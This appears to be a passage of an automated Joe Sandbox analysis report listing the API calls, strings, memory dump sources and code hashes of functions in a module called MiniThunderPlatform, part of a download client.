                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(data_input_for_p2p,00000000,?), ref: 100E145B
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E147F
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100E14C2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@??3@CriticalIncrementInitializeInterlockedSectionV01@@
                                                                                                                                              • String ID: data_input_for_p2p
                                                                                                                                              • API String ID: 3166304441-2432989058
                                                                                                                                              APIs
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@ExceptionThrowV12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 3539582707-543223747
                                                                                                                                              • Opcode ID: 6d67d9e11e87548ec96450e1b865b950cc3cae5cf55b3d670facdd6a6e49ba08
                                                                                                                                              • Instruction ID: 52de34e9447b5c49c70446742e8cfe9e82b37b84220d25d148fcabf31ce63b05
                                                                                                                                              • Opcode Fuzzy Hash: 6d67d9e11e87548ec96450e1b865b950cc3cae5cf55b3d670facdd6a6e49ba08
                                                                                                                                              • Instruction Fuzzy Hash: 92316830A01248DFD714DF58C988BAAB7F1FF85314F2980AED84A5B242CB36AE45CB41
                                                                                                                                              APIs
                                                                                                                                              • strstr.MSVCR71(?,), ref: 100793B9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000000), ref: 100793CE
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10079434
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@mallocstrstr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4179029228-2344752452
                                                                                                                                              • Opcode ID: 81ad69ace99300c2968c105e8e6011a695aaf188b2bae949b62654470defb585
                                                                                                                                              • Instruction ID: c92974e0417696171e0df598aba1d6d9914375e9c9dd127d1fd46919240c971b
                                                                                                                                              • Opcode Fuzzy Hash: 81ad69ace99300c2968c105e8e6011a695aaf188b2bae949b62654470defb585
                                                                                                                                              • Instruction Fuzzy Hash: D321AE712082819FC754CB28D959B5BBBE4FB99760F400A6EF49AC3291DB34D805CB56
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not opened, can't query filename_header_value), ref: 100A42B5
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 100A42D7
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Disposition,00000000), ref: 10095089
                                                                                                                                                • Part of subcall function 10095030: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100950B5
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(httpresponse_header don't have field: Content-Disposition,00000000), ref: 100950D7
                                                                                                                                                • Part of subcall function 10095030: _CxxThrowException.MSVCR71(?,102BBD20), ref: 10095100
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000), ref: 10095110
                                                                                                                                                • Part of subcall function 10095030: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(filename=,00000000,00000009), ref: 10095140
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1009515B
                                                                                                                                                • Part of subcall function 10095030: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A42F3
                                                                                                                                              Strings
                                                                                                                                              • not opened, can't query filename_header_value, xrefs: 100A42AC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@ExceptionThrowV01@@$??0exception@@?find@?$basic_string@H_prolog
                                                                                                                                              • String ID: not opened, can't query filename_header_value
                                                                                                                                              • API String ID: 3030010980-695616506
                                                                                                                                              • Opcode ID: 83f630d59e1d35258b4053ee755060a4f5aca9babc73d43bbf6bf072602e3d21
                                                                                                                                              • Instruction ID: 5cf2f836502d0956f89a8f1cdb04026eedab45e33b05a241c5a1b5403e6b5cb1
                                                                                                                                              • Opcode Fuzzy Hash: 83f630d59e1d35258b4053ee755060a4f5aca9babc73d43bbf6bf072602e3d21
                                                                                                                                              • Instruction Fuzzy Hash: 5B114F7A604780DFC215DB59CC54A9BF3E9FBD9750F008A2EF55A93340CB35A906CB92
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not opened, can't query file_type_header_value), ref: 100A4375
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 100A4397
                                                                                                                                                • Part of subcall function 10095E80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10095EF3
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F0A
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F19
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A43B3
                                                                                                                                              Strings
                                                                                                                                              • not opened, can't query file_type_header_value, xrefs: 100A436C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@V01@@$??0exception@@ExceptionH_prologThrow
                                                                                                                                              • String ID: not opened, can't query file_type_header_value
                                                                                                                                              • API String ID: 2396310601-3586627260
                                                                                                                                              • Opcode ID: f84ef8d5a8f2f7bc9f83e2c56fd7f92b48c6c634697326ff11a246320d0a0377
                                                                                                                                              • Instruction ID: b74c4aa2dc92a7b92e3c7572a9ff340836130196616514beca1e5b01f027833b
                                                                                                                                              • Opcode Fuzzy Hash: f84ef8d5a8f2f7bc9f83e2c56fd7f92b48c6c634697326ff11a246320d0a0377
                                                                                                                                              • Instruction Fuzzy Hash: 8F11947A104780DFC715DB59CC50A9BF3E5FBD9610F008A2EF55A93340CB35A905CB52
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1003D17B
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                               • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                               • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\asyn_io_operation.cpp$segments_num != 0$thunder_assert
                                                                                                                                              • API String ID: 1027865869-4219060924
                                                                                                                                              • Opcode ID: 8fd351819e214b13dcfe4b2f09be467eb2069531120dbe20789edc879a98480c
                                                                                                                                              • Instruction ID: 6728b9421c9338522cd279a163a85324cc5637fa66449347949c56e2e5c288ed
                                                                                                                                              • Opcode Fuzzy Hash: 8fd351819e214b13dcfe4b2f09be467eb2069531120dbe20789edc879a98480c
                                                                                                                                              • Instruction Fuzzy Hash: 5E018CB1A003086FE710DE39EC82B97B3D8FB64256F44442EE94ED3202DB32B9248761
                                                                                                                                              APIs
                                                                                                                                              • DisableThreadLibraryCalls.KERNEL32(?), ref: 100201A3
                                                                                                                                                • Part of subcall function 10013610: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 10013678
                                                                                                                                                • Part of subcall function 10013610: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000001), ref: 10013690
                                                                                                                                                • Part of subcall function 10013610: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,102404D3,000000FF,1001C2E6,?,?,00000000), ref: 100136B1
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100201CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100201D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$?rfind@?$basic_string@?substr@?$basic_string@CallsDisableH_prologLibraryThreadV01@V12@Y?$basic_string@
                                                                                                                                              • String ID: prop.txt
                                                                                                                                              • API String ID: 1535647739-292457697
                                                                                                                                              • Opcode ID: 57e7234f2afbcd4be898ca50276132e564d26134fbc5408c2a3331164fabd34a
                                                                                                                                              • Instruction ID: ad6afa6f122c58b80bf1f6c29a02a8e247259d02919eb79b0bfa5298f829a963
                                                                                                                                              • Opcode Fuzzy Hash: 57e7234f2afbcd4be898ca50276132e564d26134fbc5408c2a3331164fabd34a
                                                                                                                                              • Instruction Fuzzy Hash: 75017135900128ABDF04EFA0DC49DDE77B9EF19354F808419F802A7151DB34A654CBA1
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1005D206
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$AssignH_prologV01@@
                                                                                                                                              • String ID: .\dl_plugin_fs.cpp$NULL != _pFIS$thunder_assert
                                                                                                                                              • API String ID: 1023840165-1905948359
                                                                                                                                              • Opcode ID: cc18bb81bc3f23175356fb3b164e72495895f329dea5d1ce340bdf1e4afec571
                                                                                                                                              • Instruction ID: 01b44f4b57ffd03dbf641491c552abaff9d6acd85b02b5b32c971d69dfe24d73
                                                                                                                                              • Opcode Fuzzy Hash: cc18bb81bc3f23175356fb3b164e72495895f329dea5d1ce340bdf1e4afec571
                                                                                                                                              • Instruction Fuzzy Hash: 44F09075400B00AFD720EBA0CC09F5B77A5FF69315F018C0AF45597252C770B45586A6
                                                                                                                                              APIs
                                                                                                                                              • __aulldiv.LIBCMT ref: 10085196
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@__aulldiv
                                                                                                                                              • String ID: .\bcids_info.cpp$_block_size != 0$thunder_assert
                                                                                                                                              • API String ID: 2143915368-1568384318
                                                                                                                                              • Opcode ID: 2e79ad41537111d63314df9271d50bfe5010af4f37a61a3bba4f7425bd8e55a5
                                                                                                                                              • Instruction ID: 64b08c7b5cde1454239bf29b77f8e96f852ca4f907dbd2708cededbd302ef8c9
                                                                                                                                              • Opcode Fuzzy Hash: 2e79ad41537111d63314df9271d50bfe5010af4f37a61a3bba4f7425bd8e55a5
                                                                                                                                              • Instruction Fuzzy Hash: 74E08C796003017BE260DA249C82FA7B3E8EBA4241F418A0AB950A7281D670B8A083A0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D4251
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100D4261
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 100D4287
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
